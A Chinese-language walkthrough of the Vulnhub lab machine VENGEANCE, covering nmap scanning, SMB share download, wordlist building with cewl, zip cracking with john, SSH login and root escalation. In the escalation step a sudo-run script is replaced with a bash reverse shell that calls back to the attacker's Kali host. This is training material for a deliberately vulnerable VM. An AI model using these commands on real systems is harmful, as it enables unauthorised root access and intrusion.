Vulnhub-DIGITALWORLD.LOCAL: VENGEANCE渗透

文章目录

  • 前言
    • 1、靶机ip配置
    • 2、渗透目标
    • 3、渗透概括
  • 开始实战
    • 一、信息获取
    • 二、smb下载线索
    • 三、制作字典
    • 四、爆破压缩包密码
    • 五、线索分析
    • 六、提权!!!

Vulnhub靶机:DIGITALWORLD.LOCAL: VENGEANCE ( digitalworld.local: VENGEANCE ) 渗透测试

前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!

 👉本文靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP: 192.168.100.128
  • 靶机IP: 192.168.100.131
    靶机ip获取方式如下图(PS:该靶机用VirtualBox打开可能获取不到IP地址,所以使用的VMware打开的,因为博主这边的kali是用的两个网卡,所以加了一个参数 '--interface eth1' ,如果大家是只有一个网卡的话,这个参数可以直接去掉)
    在这里插入图片描述

2、渗透目标

  • 获取shell权限!!!

3、渗透概括

  1. smb信息获取
  2. cewl工具的使用
  3. zip密码破解
  4. 对线索信息的分析
  5. tftp的使用
  6. 通过tftp传反弹shell,配合sudo提权


开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -T4 -p- 192.168.100.131 
	Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:32 EST
	Nmap scan report for 192.168.100.131
	Host is up (0.0020s latency).
	Not shown: 65515 filtered tcp ports (no-response)
	PORT      STATE  SERVICE      VERSION
	7/tcp     closed echo
	22/tcp    closed ssh
	80/tcp    open   http         nginx 1.18.0 (Ubuntu)
	|_auth-owners: www-data
	|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
	|_http-server-header: nginx/1.18.0 (Ubuntu)
	88/tcp    closed kerberos-sec
	110/tcp   open   pop3?
	113/tcp   open   ident?
	|_auth-owners: root
	139/tcp   open   netbios-ssn  Samba smbd 4.6.2
	|_auth-owners: root
	143/tcp   open   imap?
	161/tcp   closed snmp
	389/tcp   closed ldap
	443/tcp   open   ssl/http     nginx 1.18.0 (Ubuntu)
	|_ssl-date: TLS randomness does not represent time
	|_auth-owners: www-data
	| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG
	| Not valid before: 2021-02-14T02:40:28
	|_Not valid after:  2022-02-14T02:40:28
	|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
	|_http-server-header: nginx/1.18.0 (Ubuntu)
	| tls-alpn: 
	|   h2
	|_  http/1.1
	| tls-nextprotoneg: 
	|   h2
	|_  http/1.1
	445/tcp   open   netbios-ssn  Samba smbd 4.6.2
	|_auth-owners: root
	993/tcp   open   imaps?
	995/tcp   open   pop3s?
	1337/tcp  closed waste
	2049/tcp  closed nfs
	6000/tcp  closed X11
	8080/tcp  closed http-proxy
	22222/tcp open   ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
	|_auth-owners: root
	| ssh-hostkey: 
	|   3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)
	|   256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)
	|_  256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)
	54321/tcp closed unknown
	MAC Address: 00:0C:29:12:9E:6D (VMware)
	Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (93%), Linux 5.0 - 5.5 (93%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 5.0 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%)
	No exact OS matches for host (test conditions non-ideal).
	Network Distance: 1 hop
	Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
	
	Host script results:
	| smb2-security-mode: 
	|   3:1:1: 
	|_    Message signing enabled but not required
	| smb2-time: 
	|   date: 2024-02-20T09:36:35
	|_  start_date: N/A
	
	TRACEROUTE
	HOP RTT     ADDRESS
	1   2.03 ms 192.168.100.131
	
	OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
	Nmap done: 1 IP address (1 host up) scanned in 303.88 seconds

可以/看出扫出来的信息还是非常多的,那些被关闭的端口就先直接pass(大胆猜测可能需要敲门才能开,特别是那个54321端口),我们主要看大概率能利用并且开放的端口,如下

22222/sshssh的默认端口被改了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息才使用这个,先暂时pass掉

139/smb文件共享服务samba,在这个服务上面可以试试看能不能获取到一些敏感文件

80/http和443/https基本上大部分的漏洞都是存在于web服务上


使用enum4linux 192.168.100.131命令对smb服务进行枚举
发现了两个用户saraqinyi
在这里插入图片描述

还发现了Sara的共享文件sarapublic$
在这里插入图片描述

二、smb下载线索

我们再使用命令smbclient //192.168.100.131/sarapublic$进入到这个共享目录的命令行
发现里面有很多的文件,我们把它们下载到本地看看
在这里插入图片描述

我们下载该目录的所有文件至本地
我们使用如下命令对其进行下载

smb: \> recurse on		#打开递归模式,使mget可以递归下载
smb: \> prompt off		#关闭交互,不需要输入y/n进行确认
smb: \> mget *			#下载当前目录的所有文件

在这里插入图片描述

如下所示,使用exit退出smb命令行,可以看到所有的文件都已经下载到我们的本地目录了
并且smb上的所有文件都已经下载下来了
在这里插入图片描述

三、制作字典

里面有一个压缩包,但是需要密码,直接用john爆破了很久没有结果
在这里插入图片描述

还有两个文件夹champagnecognac,其中cognac里面是一个文本文件,champagne里面是一个域名,看起来是一个网站里面的源文件,最显著的特征就是robots.txt的爬虫文件
在这里插入图片描述

除开两个文件夹和压缩包,其他的几乎都是文本文件
ps:感兴趣的朋友可以看看这些文件里面的内容,里面会提供一定的线索
在这里插入图片描述

我们可以换一个思路,下载下来的文件有很多文本文件,看似都没有什么用,我们可以使用cewl工具对这个这些文本文件里面的内容进行密码组装,来制作一个字典
先使用如下命令组合一下这些文本文件,并保存到info.txt文件中

cat blurb.txt eaurouge eaurouge.txt essay.txt profile.txt > info.txt

在这里插入图片描述

由于cewl工具的目标是web上的信息,所以我们得给这个工具传url
我们使用如下命令,使用python工具开启一个目录简单得web服务,再使用cewl爬取这个info.txt文件内得信息,并且重定向到passwd.txt的密码文件

python3 -m http.server -b 192.168.100.128 80 &; cewl 192.168.100.128/info.txt > passwd.txt

在这里插入图片描述

四、爆破压缩包密码

我们再使用zip2john工具对这个加密的gio.zip压缩文件提取密文,并将提取出的内容保存到burpfile文件
在这里插入图片描述

再使用john --wordlist=passwd.txt burpfile爆破该压缩包密码
如下所示爆出来的密码为nanotechnological
在这里插入图片描述

里面给了一个大爷的图片tryharder.png和一个pptted_talk.pptx,还有一个密码提醒文件pass_reminder.txt
在这里插入图片描述

五、线索分析

我们打开这个密码提示文件
如下图所示,可以大胆的猜测这可能是一个密码的格式
名字_弯道(拐角)_路线
在这里插入图片描述

密码的格式给了,我们现在看看这个ppt里面的内容
在第一页发现了一个名字Giovanni Berlusconi,先记录一下
在这里插入图片描述

在第三页里发现了一个地址信息Suzuka 130R
在这里插入图片描述

现在我们整理我们获得的信息

两个用户: saraqinyi
名字: Giovanni Berlusconi
地址: Suzuka 130R

我们直接用ssh去连接,通过不断的尝试,最终得到了正确的用户名qinyi和密码giovanni_130R_Suzuka
在这里插入图片描述

六、提权!!!

我们用sudo -l命令看一下
发现了在sara用户目录下的eaurouge文件是以root权限运行的
我们虽然可以以sudo的权限执行,但是直接进/home/sara/private目录看这个文件是没有权限的,所以我们要想其他的办法
在这里插入图片描述

我们使用ps -aux命令看一下进程
如下图发下了一个tftp服务,并且监听地址是69,路径是/home/sara/private
我们来了解一下tftptftp和ftp实现的功能差不多,只不过tftp使用的udp协议,并且监听的端口一般是udp的69
在这里插入图片描述

那么我们可以使用tftp服务将eaurouge下载下来看看
通过如下命令下载
在这里插入图片描述

分析这个文件里面的内容
是一个sh脚本,功能就是在touch /home/sara/public/目录下创建一个test.txt文件
并且修改相应的权限,还有文件内容
在这里插入图片描述

那么这就好办了
我们直接更改这个文件,将反弹shell的代码植入进去,然后再执行这个文件即可获取到root权限
我们修改我们下载下来的eaurouge文件改为如下内容

#!/bin/bash

/bin/bash -i >& /dev/tcp/192.168.100.128/1234 0>&1

在这里插入图片描述

再将这个文件上传上去
在这里插入图片描述

然后使用nc -lvvp 1234监听反弹shell
在这里插入图片描述

最后我们在靶机上通过如下命令执行我们含有反弹shell的文件

sudo /home/sara/private/./eaurouge

在这里插入图片描述

这个时候我们可以看到我们kali监听的端口就收到了靶机的shell,并且是root权限
至此我们的渗透已经完成,该靶机没有flag文件,所以就直接结束啦!
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/586264.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

chrome和drive安装包路径

Chrome for Testing availability (googlechromelabs.github.io) 下载Stable下面的包哈

【Leetcode每日一题】 分治 - 排序数组(难度⭐⭐)(69)

1. 题目解析 题目链接:912. 排序数组 这个问题的理解其实相当简单,只需看一下示例,基本就能明白其含义了。 2.算法原理 归并排序(Merge Sort)是一种采用“分而治之”(Divide and Conquer)策略…

LLM之RAG实战(三十八)| RAG分块策略之语义分块

在RAG应用中,分块是非常重要的一个环节,常见的分块方法有如下几种: Fixed size chunkingRecursive ChunkingDocument Specific ChunkingSemantic Chunking a)Fixed size chunking:这是最常见、最直接的分块方法。我们…

C/C++基础语法练习 - 计算阶乘(新手推荐阅读✨)

题目链接:https://www.starrycoding.com/problem/160 题目描述 给定一个整数 n n n,输出阶乘 n ! n! n!。 输入格式 一个整数 n ( 1 ≤ n ≤ 20 ) n(1 \le n \le 20) n(1≤n≤20)。 输出格式 一个整数 n ! n! n!。 输入样例1 16输出样例1 20922…

树的中心 树形dp

#include<bits/stdc.h> using namespace std; int n; const int N 100005; // 无向边 int ne[N * 2], e[N * 2], idx; int h[N]; int vis[N];int ans 0x7fffffff;void add(int a, int b) {e[idx] b, ne[idx] h[a], h[a] idx; }int dfs(int u) { // 作为根节点vis[u]…

机器学习:基于Sklearn,使用随机森林分类器RandomForestClassifier检测信用卡欺诈

前言 系列专栏&#xff1a;机器学习&#xff1a;高级应用与实践【项目实战100】【2024】✨︎ 在本专栏中不仅包含一些适合初学者的最新机器学习项目&#xff0c;每个项目都处理一组不同的问题&#xff0c;包括监督和无监督学习、分类、回归和聚类&#xff0c;而且涉及创建深度学…

分享一份物联网 SAAS 平台架构设计

一、架构图**** 二、Nginx**** 用于做服务的反向代理。 三、网关**** PaaS平台所有服务统一入口&#xff0c;包含token鉴权功能。 四、开放平台**** 对第三方平台开放的服务入口。 五、MQTT**** MQTT用于设备消息通信、内部服务消息通信。 六、Netty**** Socket通信设…

IoTDB 入门教程①——时序数据库为什么选IoTDB ?

文章目录 一、前文二、性能排行第一三、完全开源四、数据文件TsFile五、乱序数据高写入六、其他七、参考 一、前文 IoTDB入门教程——导读 关注博主的同学都知道&#xff0c;博主在物联网领域深耕多年。 时序数据库&#xff0c;博主已经用过很多&#xff0c;从最早的InfluxDB&a…

正点原子[第二期]Linux之ARM(MX6U)裸机篇学习笔记-9.1-LED灯(模仿STM32驱动开发实验)

前言&#xff1a; 本文是根据哔哩哔哩网站上“正点原子[第二期]Linux之ARM&#xff08;MX6U&#xff09;裸机篇”视频的学习笔记&#xff0c;在这里会记录下正点原子 I.MX6ULL 开发板的配套视频教程所作的实验和学习笔记内容。本文大量引用了正点原子教学视频和链接中的内容。…

IDEA:Server‘s certificate is not trusted(服务器的证书不受信任)

IDEA&#xff1a;Server‘s certificate is not trusted&#xff08;服务器的证书不受信任&#xff09; 打开idea&#xff0c;发现一个莫名其妙的证书弹出来&#xff0c;还关不掉发现组织名是 Doctorcom LTD.百度了下 不知道是什么东西 这也不是下面这种破解了idea的情况 30069…

Ajax.

目录 1. 服务器相关的基础概念 1.1 服务器 1.2 客户端 1.3 服务器对外提供的资源 1.4 数据也是资源 1.5 资源与 URL 地址 1.6 什么是 Ajax 2. Ajax 的基础用法 2.1 POST 请求 2.2 GET 请求 2.3 DELETE 请求 2.4 PUT 请求 2.5 PATCH 请求 3. axios 3.1 axios 的基…

IoTDB 入门教程 问题篇①——内存不足导致datanode服务无法启动

文章目录 一、前文二、问题三、分析四、继续分析五、解决问题 一、前文 IoTDB入门教程——导读 二、问题 执行启动命令&#xff0c;但是datanode服务却无法启动&#xff0c;查询不到6667端口 bash sbin/start-standalone.sh 进而导致数据库连接也同样失败 [rootiZ2ze30dygwd6…

Go 语言(三)【面向对象编程】

1、OOP 首先&#xff0c;Go 语言并不是面向对象的语言&#xff0c;只是可以通过一些方法来模拟面向对象。 1.1、封装 Go 语言是通过结构体&#xff08;struct&#xff09;来实现封装的。 1.2、继承 继承主要由下面这三种方式实现&#xff1a; 1.2.1、嵌套匿名字段 //Add…

实操——使用uploadify插件(php版和Java版) 与 Dropzone.js插件分别实现附件上传

实操——使用uploadify插件&#xff08;php版和Java版&#xff09;与 Dropzone.js插件分别实现附件上传 1. 使用uploadify插件上传1.1 简介1.1.1 简介1.1.2 参考GitHub 1.2 后端PHP版本的uploadify1.2.1 下载项目的目录结构1.2.2 测试看界面效果1.2.3 附页面代码 和 PHP代码 1.…

ctfshow——SQL注入

文章目录 SQL注入基本流程普通SQL注入布尔盲注时间盲注报错注入——extractvalue()报错注入——updataxml()Sqlmap的用法 web 171——正常联合查询web 172——查看源代码、联合查询web 173——查看源代码、联合查询web 174——布尔盲注web 176web 177——过滤空格web 178——过…

LLM 构建Data Multi-Agents 赋能数据分析平台的实践之③:数据分析之二(大小模型协同)

一、概述 随着新一代信息技术在产业数字化中的应用&#xff0c;产生了大量多源多模态信息以及响应的信息处理模式&#xff0c;数据孤岛、模型林立的问题也随之产生&#xff0c;使得业务系统臃肿、信息处理和决策效率低下&#xff0c;面对复杂任务及应用场景问题求解效率低。针…

【iOS】消息流程分析

文章目录 前言动态类型动态绑定动态语言消息发送objc_msgSendSEL&#xff08;selector&#xff09;IMP&#xff08;implementation&#xff09;IMP高级用法 MethodSEL、IMP、Method总结流程概述 快速查找消息发送快速查找的总结buckets 慢速查找动态方法解析resolveInstanceMet…

如何远程访问服务器?

在现代信息技术的快速发展下&#xff0c;远程访问服务器已成为越来越多用户的需求。远程访问服务器能够让用户随时随地通过网络连接服务器&#xff0c;实现数据的传输和操作。本文将介绍远程访问服务器的概念&#xff0c;以及一种广泛应用于不同行业的远程访问解决方案——【天…

软考之零碎片段记录(二十九)+复习巩固(十七、十八)

学习 1. 后缀式&#xff08;逆波兰式&#xff09; 2. c/c语言编译 类型检查是语义分析 词法分析。分析单词。如单词的字符拼写等语法分析。分析句子。如标点符号、括号位置等语言上的错误语义分析。分析运算符、运算对象类型是否合法 3. java语言特质 即时编译堆空间分配j…

2024抖音AI图文带货班:在这个赛道上 乘风破浪 拿到好效果

课程目录 1-1.1 AI图文学习指南 1.mp4 2-1.2 图文带货的新机会 1.mp4 3-1.3 2024年优质图文新标准 1.mp4 4-1.4 图文如何避免违规 1.mp4 5-1.5 优质图文模板解析 1.mp4 6-2.1 老号重启 快速破局 1.mp4 7-2.2 新号起号 不走弯路 1.mp4 8-2.3 找准对标 弯道超车 1.mp4 9…